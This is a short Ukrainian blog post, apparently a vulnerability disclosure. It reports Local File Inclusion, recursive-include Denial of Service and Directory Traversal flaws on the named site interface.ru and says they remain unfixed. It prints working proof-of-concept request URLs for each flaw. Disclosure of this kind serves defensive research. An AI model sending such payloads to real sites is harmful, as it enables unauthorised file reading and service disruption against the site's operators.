Websecurity - Веб безпека

11.12.2008

У лютому, 15.02.2008, я знайшов Local File Inclusion, Denial of Service та Directory Traversal уразливості на проекті http://www.interface.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливість на www.interface.ru.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

29.04.2009

Local File Inclusion:

http://www.interface.ru/fset.asp?Url=fset.asp

DoS (Recursive File Include):

http://www.interface.ru/fset.asp?Url=fset.asp?Url=fset.asp

http://www.interface.ru/fset.asp?Url=fset.asp … ?Url=fset.asp

Для проведення DoS атаки через рекурсивне включення файлів, потрібно безпосередньо в запиті (в URL) вказати необхідний рівень рекурсії. Тому що в ASP рекурсивне включення не виконується автоматично.

Directory Traversal:

http://www.interface.ru/fset.asp?Url=../robots.txt

Дані уразливості досі не виправлені.

This entry was posted on 19:35 29.04.2009 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.